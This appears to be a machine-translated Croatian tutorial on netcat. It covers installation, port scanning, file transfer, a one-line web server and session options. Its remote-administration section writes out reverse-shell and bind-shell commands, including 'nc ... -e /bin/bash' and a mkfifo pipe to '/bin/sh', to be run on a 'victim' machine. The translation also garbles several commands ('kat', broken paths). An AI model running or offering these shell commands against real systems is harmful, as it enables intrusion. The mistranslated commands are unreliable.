Kratka razlika između netcat-traditional i netcat-openbsd
Za netcat su dostupna dva slična paketa s malom razlikom između njih.
netcat-tradicionalni uključuje dodatnu opciju '-e' koja se može koristiti za vezivanje programa (tj.e bash) s netcatom. Ova je značajka vrlo korisna za daljinsko administriranje.
netcat-openbsd imaju dodatnu podršku za IPv6 i proxyje.
Instalacija Netcat
Iako je netcat unaprijed instaliran u većini Linux distribucija, ali ako nije, lako se može instalirati pomoću sljedećih naredbi.
Za tradicionalni paket,
[zaštićena e-poštom]: ~ $ sudo apt-get install netcat-traditionalZa verziju openbsd,
[zaštićena e-poštom]: ~ $ sudo apt-get install netcat-openbsdNetcat za Windows možete preuzeti ovdje https: // sourceforge.net / projects / nc110 / files /.
Sada ćemo istražiti neke zanimljive slučajeve upotrebe netcata
Skeniranje priključaka pomoću netcat
Za traženje otvorenih priključaka koristite opciju -z. Netcat će se pokušati povezati na sve priključke bez slanja podataka ili vrlo ograničenih podataka u UDP slučaju. Upišite sljedeće
[zaštićena e-poštom]: ~ $ nc -z -v hackme.org 80... odreži ..
hackme.org [217.78.1.155] 80 (http) otvoreno
Da biste skenirali niz luka, upišite
[zaštićena e-poštom]: ~ $ nc -z -nv 192.168.100.72 20-80(NEPOZNATO) [192.168.100.72] 80 (http) otvoreno
(NEPOZNATO) [192.168.100.72] 22 (ssh) otvoreno
Prijenos datoteka s netcatom
Još jedan koristan slučaj upotrebe netcat je prijenos datoteka između udaljenih računala. Tekstove i binarne datoteke možete slati s jednog računala na drugo računalo. Pokušat ćemo poslati datoteku „datoteka.pdf ”s Linux PC-a na Windows PC [IP 192.168.100.72] koristeći netcat kao primjer.
Na Windows računalu (prijemniku) upišite sljedeće
C: \ Korisnici> nc -nvlp 1337> datoteka.pdfSlušanje na [0.0.0.0] (obitelj 2, luka 1337)
Na Linux računalu (pošiljatelju) upišite sljedeće
[e-pošta zaštićena]: ~ $ nc -nv 192.168.100.72 1337 < file.pdfVeza na 192.168.100.72 1337 port [tcp / *] je uspio!
Udaljena administracija s netcatom
Jedan od najboljih slučajeva upotrebe netcata je daljinsko administriranje, što znači da možete kontrolirati tuđe računalo pomoću netcata. Netcat-traditional dolazi s opcijom '-e' koja se može koristiti za povezivanje programa (tj.e cmd.exe u sustavu Windows ili bash u Linuxu) s priključkom, što znači da će Netcat djelovati kao komunikator između programa i udaljenog računala. Netcat će primati naredbe s udaljenog računala, izvršavati se na lokalnom sustavu i slati rezultate natrag na udaljeno računalo. Ova se značajka naširoko koristi u zlonamjerne svrhe, kako bi se zaštitila pozadinska vrata računala i poslužitelja. Ova je značajka dostupna samo na netcat-tradicionalnom, ali uz mali trik, netcat-openbsd se također može koristiti u istu svrhu. Možete koristiti dva načina za upravljanje tuđim računalom.
U Obrnuta ljuska veze, napadač preslušava na priključku i čeka da se veza pošalje sa žrtvinog stroja. Koristi se kada je računalo žrtve iza NAT-a ili nema javni IP.
Da biste dobili obrnutu ljusku pomoću netcat-a, morate preslušati na priključku koristeći netcat. Upišite sljedeće na napadački stroj,
[e-pošta zaštićena]: ~ $ nc -nvlp 1337Slušanje na [0.0.0.0] (obitelj 2, luka 1337)
Na stroju žrtve (ako netcat-tradicionalni je instaliran)
// zamijenite “/ bin / bash” sa “cmd.exe ”u slučaju sustava Windows
[e-pošta zaštićena]: ~ $ nc -nv [IP_ADDR] 1337 -e / bin / bashZa netcat-openbsd (gdje opcija "-e" nije podržana)
[e-pošta zaštićena]: ~ $ rm / tmp / f; mkfifo / tmp / f; kat/ tmp / f | / bin / sh -i 2> & 1 | nc [IP_ADDR] 1337> / tmp / f
Dok je u Vezati školjku veze, napadač veže port na računalu žrtve i povezuje se s tim portom pomoću klijentske utičnice. Koristi se kada je napadačev stroj iza NAT-a ili nema javni IP.
Na stroju žrtve upišite
[e-pošta zaštićena]: ~ $ nc -nlvp 1337 -e / bin / bashslušam [bilo koji] 1337 ..
Sada, za pokretanje naredbi na računalu žrtve, upišite
[e-pošta zaštićena]: ~ $ nc -nv 127.0.0.1 1337Veza na 127.0.0.1 1337 port [tcp / *] je uspio!
$ id
uid = 1000 (azad) gid = 1000 (azad) grupe = 1000 (azad), 4 (adm), 24 (cdrom), 27 (sudo),
30 (dip), 46 (plugdev), 118 (lpadmin), 129 (sambashare)
Jednostavan web poslužitelj koji koristi netcat
Također možete napraviti još jedan jednostavan trik da Netcat koristite kao minimalni web poslužitelj s jednom stranicom. Ovaj web poslužitelj bio bi vrlo jednostavan bez posebnih konfiguracija i na njega ćemo poslati svoj HTML kôd u preglednik.
[e-pošta zaštićena]: ~ $ while true; do echo -e "HTTP / 1.1 200 U redu \ n \ n $ (odjek "
Moj jednostavni web poslužitelj koji koristi netcat
")" | nc -nvlp 1337; gotovoSlušanje na [0.0.0.0] (obitelj 2, luka 1337)
Pokušajte dohvatiti web stranicu pomoću curla
[zaštićena e-poštom]: ~ $ curl http: // 127.0.0.1: 1337 /Moj jednostavni web poslužitelj koji koristi netcat
Navedite vremensko ograničenje za netcat sesiju
Možete odrediti vremensko ograničenje za netcat sesiju pomoću opcije -w. Netcat će automatski isključiti svoju sesiju nakon što određeno vrijeme prođe.
// -w [Vrijeme u sekundama][e-pošta zaštićena]: ~ $ nc -w 40 -nvlp 1337
Slušanje na [0.0.0.0] (obitelj 2, luka 1234)
Nastavite slušati čak i ako klijent prekine vezu
U normalnom načinu rada, netcat poslužitelj se isključuje i prestaje slušati na portu kada klijent zatvori vezu. Poslužitelj možete držati gore koristeći opciju -k
[e-pošta zaštićena]: ~ $ nc -k -nlvp 1234Slušanje na [0.0.0.0] (obitelj 2, luka 1234)
Zaključak
Netcat je jednostavan, ali učinkovit uslužni program koji se može koristiti za puno jednostavnih svakodnevnih zadataka. Dolazi predinstaliran u gotovo svaki UNIX poput operativnih sustava i može se koristiti za razne zadatke poput komunikacije između dva računala, prijenosa datoteka i mnogih drugih.